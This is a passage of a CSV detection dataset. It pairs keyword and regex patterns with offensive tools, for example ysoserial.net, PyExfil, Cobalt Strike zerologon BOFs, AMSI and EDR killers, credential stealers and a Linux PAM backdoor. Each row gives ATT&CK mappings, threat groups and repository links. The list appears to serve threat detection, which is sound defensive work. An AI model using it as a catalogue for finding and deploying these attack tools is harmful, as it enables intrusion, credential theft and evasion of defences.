T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/TrustedPath-UACBypass-BOF","1","1","N/A","10","10","112","35","2021-08-16T07:49:55Z","2021-08-07T03:40:33Z" "*ysoserial.net*",".{0,1000}ysoserial\.net.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","1","N/A","10","10","3026","460","2023-10-17T12:27:23Z","2017-09-18T17:48:08Z" "*ysoserial.sln*",".{0,1000}ysoserial\.sln.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","1","N/A","10","10","3026","460","2023-10-17T12:27:23Z","2017-09-18T17:48:08Z" "*ytisf/PyExfil*",".{0,1000}ytisf\/PyExfil.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","","","Data Exfiltration","https://github.com/ytisf/PyExfil","1","1","N/A","10","8","738","138","2023-02-17T03:12:36Z","2014-11-27T19:06:24Z" "*yunuscadirci/CallStranger*",".{0,1000}yunuscadirci\/CallStranger.{0,1000}","offensive_tool_keyword","POC","Vulnerability checker for Callstranger (CVE-2020-12695). An attacker can use this vulnerability for Bypassing DLP for exfiltrating data. Using millions of Internet-facing UPnP device as source of amplified reflected TCP DDoS / SYN Flood? 
Scanning internal ports from Internet facing UPnP devices This script only simulates data exfiltration","T1046 - T1595 - T1587","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation tools","https://github.com/yunuscadirci/CallStranger","1","1","N/A","N/A","5","402","67","2021-08-07T16:48:55Z","2020-06-08T07:37:49Z" "*Yuuup!! Pass Cracked*",".{0,1000}Yuuup!!\sPass\sCracked.{0,1000}","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://raw.githubusercontent.com/Sup3r-Us3r/scripts/master/fb-brute.pl","1","0","N/A","7","10","N/A","N/A","N/A","N/A" "*YwBhAGwAYwA=*",".{0,1000}YwBhAGwAYwA\=.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Z1P73136r4M(*",".{0,1000}Z1P73136r4M\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*Z1P7H1N65(*",".{0,1000}Z1P7H1N65\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*Z1PF01D3r(*",".{0,1000}Z1PF01D3r\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*Z29oYWxleWdvYW5kaGFja2F3YXl0aGVnaWJzb24*",".{0,1000}Z29oYWxleWdvYW5kaGFja2F3YXl0aGVnaWJzb24.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*Z4nzu/hackingtool*",".{0,1000}Z4nzu\/hackingtool.{0,1000}","offensive_tool_keyword","hackingtool","ALL IN ONE Hacking Tool For 
Hackers","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Z4nzu/hackingtool","1","1","N/A","N/A","10","42797","4691","2024-04-30T19:30:47Z","2020-04-11T09:21:31Z" "*zabbix_session_exp.py -*",".{0,1000}zabbix_session_exp\.py\s\-.{0,1000}","offensive_tool_keyword","POC","POC exploitation of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1548 - T1190","TA0003 - TA0002","N/A","N/A","Exploitation tools","https://github.com/random-robbie/cve-2022-23131-exp/blob/main/zabbix.py","1","0","N/A","N/A","1","8","7","2022-02-23T16:37:13Z","2022-02-23T16:34:03Z" "*zabbix_session_exp.py https*",".{0,1000}zabbix_session_exp\.py\shttps.{0,1000}","offensive_tool_keyword","POC","POC exploitation of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1505 - T1550 - T1574 - T1210 - T1110","TA0001 - TA0009","N/A","N/A","Exploitation tools","https://github.com/Fa1c0n35/zabbix-cve-2022-23131","1","0","N/A","N/A","1","1","0","2022-02-27T11:31:02Z","2022-02-27T11:30:53Z" "*zabbix_session_exp.py*",".{0,1000}zabbix_session_exp\.py.{0,1000}","offensive_tool_keyword","POC","POC exploitation of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1548 - T1190","TA0001 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Mr-xn/cve-2022-23131","1","1","N/A","N/A","2","149","45","2022-02-24T15:02:12Z","2022-02-18T11:51:47Z" "*ZAQwsxcde321*",".{0,1000}ZAQwsxcde321.{0,1000}","offensive_tool_keyword","Throwback","HTTP/S Beaconing Implant","T1071.001 - T1102 - T1095 - T1573.001 - T1041","TA0011 - TA0009 - 
TA0010","N/A","N/A","C2","https://github.com/silentbreaksec/Throwback","1","0","N/A","10","10","304","83","2017-08-25T16:49:12Z","2014-08-08T17:06:24Z" "*zarp.py*",".{0,1000}zarp\.py.{0,1000}","offensive_tool_keyword","zarp","A network attack framework.","T1484 - T1498 - T1569","TA0001 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/hatRiot/zarp","1","0","N/A","N/A","10","1415","325","2023-05-01T20:18:05Z","2012-09-16T18:02:34Z" "*zblurx/certsync*",".{0,1000}zblurx\/certsync.{0,1000}","offensive_tool_keyword","certsync","Dump NTDS with golden certificates and UnPAC the hash","T1553.002 - T1003.001 - T1145","TA0002 - TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/zblurx/certsync","1","1","N/A","N/A","7","602","68","2024-03-20T10:58:15Z","2023-01-31T15:37:12Z" "*zblurx/dploot*",".{0,1000}zblurx\/dploot.{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","1","N/A","10","4","362","49","2024-04-03T13:35:18Z","2022-05-24T11:05:21Z" "*zcgonvh/DCOMPotato*",".{0,1000}zcgonvh\/DCOMPotato.{0,1000}","offensive_tool_keyword","DCOMPotato","Service DCOM Object and SeImpersonatePrivilege abuse.","T1548.002 - T1134.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/DCOMPotato","1","1","N/A","10","4","340","45","2022-12-09T01:57:53Z","2022-12-08T14:56:13Z" "*zed2john.py*",".{0,1000}zed2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*zenoss_3x_command_execution*",".{0,1000}zenoss_3x_command_execution.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*zephrax/linux-pam-backdoor*",".{0,1000}zephrax\/linux\-pam\-backdoor.{0,1000}","offensive_tool_keyword","linux-pam-backdoor","Linux PAM Backdoor","T1547.001 - T1556.003","TA0003 - TA0004","N/A","N/A","Persistence","https://github.com/zephrax/linux-pam-backdoor","1","1","N/A","10","3","294","81","2023-11-13T11:29:44Z","2017-06-08T21:14:34Z" "*ZephrFish/Stompy*",".{0,1000}ZephrFish\/Stompy.{0,1000}","offensive_tool_keyword","Stompy","Timestomp Tool to flatten MAC times with a specific timestamp","T1070.006","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZephrFish/Stompy","1","1","N/A","10","1","45","7","2023-10-15T17:38:23Z","2023-10-14T23:40:32Z" "*zer0condition/mhydeath*",".{0,1000}zer0condition\/mhydeath.{0,1000}","offensive_tool_keyword","mhydeath","Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.","T1562.001","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/zer0condition/mhydeath","1","1","N/A","10","4","345","63","2023-08-22T08:01:04Z","2023-08-22T07:15:36Z" "*zeroday-powershell*",".{0,1000}zeroday\-powershell.{0,1000}","offensive_tool_keyword","zeroday-powershell","This will exploit the Windows operating system allowing you to modify the file Some.dll.","T1203 - T1574.001 - T1546.011","TA0002 - TA0007 - TA0008","N/A","N/A","Exploitation tools","https://github.com/OneLogicalMyth/zeroday-powershell","1","1","N/A","N/A","4","321","88","2018-09-12T09:03:04Z","2018-09-10T16:34:14Z" "*zerologon clone *https*",".{0,1000}zerologon\sclone\s.{0,1000}https.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 
- TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*zerologon.py*",".{0,1000}zerologon\.py.{0,1000}","offensive_tool_keyword","POC","Zerologon CVE exploitation","T1210 - T1071","TA0008 - TA0006","N/A","N/A","Exploitation tools","https://github.com/michaelpoznecki/zerologon","1","1","N/A","N/A","1","10","4","2020-09-15T16:31:59Z","2020-09-15T05:32:24Z" "*zerologon.x64*",".{0,1000}zerologon\.x64.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF zerologon exploit","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ZeroLogon-BOF","1","1","N/A","10","10","152","42","2022-04-25T11:22:45Z","2020-09-17T02:07:13Z" "*zerologon.x86*",".{0,1000}zerologon\.x86.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF zerologon exploit","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - 
T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ZeroLogon-BOF","1","1","N/A","10","10","152","42","2022-04-25T11:22:45Z","2020-09-17T02:07:13Z" "*zerologon_check*",".{0,1000}zerologon_check.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*ZeroLogon-BOF*",".{0,1000}ZeroLogon\-BOF.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF zerologon exploit","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - 
T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ZeroLogon-BOF","1","1","N/A","10","10","152","42","2022-04-25T11:22:45Z","2020-09-17T02:07:13Z" "*zerologon-restore * -target-ip *",".{0,1000}zerologon\-restore\s.{0,1000}\s\-target\-ip\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*ZeroLogonScanner.*",".{0,1000}ZeroLogonScanner\..{0,1000}","offensive_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner and Earth Lusca Operations Tools and commands","T1087 - T1012 - T1064 - T1210 - T1213 - T1566 - T1071","TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/vletoux/pingcastle","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*ZeroMemoryEx/Amsi-Killer*",".{0,1000}ZeroMemoryEx\/Amsi\-Killer.{0,1000}","offensive_tool_keyword","Amsi-Killer","Lifetime AMSI bypass","T1562.001","TA0005","N/A","N/A","Defense 
Evasion","https://github.com/ZeroMemoryEx/Amsi-Killer","1","1","N/A","10","6","564","86","2023-09-26T00:49:22Z","2023-02-26T19:05:14Z" "*ZeroMemoryEx/Blackout*",".{0,1000}ZeroMemoryEx\/Blackout.{0,1000}","offensive_tool_keyword","Blackout","kill anti-malware protected processes using BYOVD","T1055 - T1562.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Blackout","1","1","N/A","N/A","9","829","127","2023-07-21T17:35:09Z","2023-05-25T23:54:21Z" "*ZEROSHELL | ZEROSTORE*",".{0,1000}ZEROSHELL\s\|\sZEROSTORE.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","php title webshell","7","10","1967","343","2024-05-01T05:24:28Z","2020-05-13T11:28:52Z" "*zerosum0x0*",".{0,1000}zerosum0x0.{0,1000}","offensive_tool_keyword","zerosum0x0","github repo username hosting backdoors pocs and exploitation tools","N/A","N/A","N/A","N/A","POST Exploitation tools","https://github.com/zerosum0x0","1","1","N/A","7","10","N/A","N/A","N/A","N/A" "*zerosum0x0*koadic*",".{0,1000}zerosum0x0.{0,1000}koadic.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*ZGF0YS5mZGEuZ292*",".{0,1000}ZGF0YS5mZGEuZ292.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*ZGIuc3NhLmdvdg==*",".{0,1000}ZGIuc3NhLmdvdg\=\=.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*zha0gongz1*",".{0,1000}zha0gongz1.{0,1000}","offensive_tool_keyword","cobaltstrike","Implement load Cobalt Strike & Metasploit&Sliver shellcode with golang","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - 
T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/zha0gongz1/DesertFox","1","0","N/A","10","10","124","27","2023-02-02T07:02:12Z","2021-02-04T09:04:13Z" "*zha0gongz1/DesertFox*",".{0,1000}zha0gongz1\/DesertFox.{0,1000}","offensive_tool_keyword","cobaltstrike","Implement load Cobalt Strike & Metasploit&Sliver shellcode with golang","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/zha0gongz1/DesertFox","1","1","N/A","10","10","124","27","2023-02-02T07:02:12Z","2021-02-04T09:04:13Z" 
"*Ziconius/FudgeC2*",".{0,1000}Ziconius\/FudgeC2.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","10","10","244","55","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" "*ziiiiizzzb*",".{0,1000}ziiiiizzzb.{0,1000}","offensive_tool_keyword","cobaltstrike","InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/InlineExecute-Assembly","1","0","N/A","10","10","547","113","2023-07-22T23:25:15Z","2021-07-08T17:40:07Z" "*ziiiiizzzib*",".{0,1000}ziiiiizzzib.{0,1000}","offensive_tool_keyword","cobaltstrike","InlineExecute-Assembly is a proof of concept 
Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/InlineExecute-Assembly","1","0","N/A","10","10","547","113","2023-07-22T23:25:15Z","2021-07-08T17:40:07Z" "*zip2john *",".{0,1000}zip2john\s.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*ZipExec/Cryptor*",".{0,1000}ZipExec\/Cryptor.{0,1000}","offensive_tool_keyword","ZipExec","A unique technique to execute binaries from a password protected zip","T1560.001 - T1204.002 - T1059.005","TA0005 - TA0002","N/A","N/A","Defense 
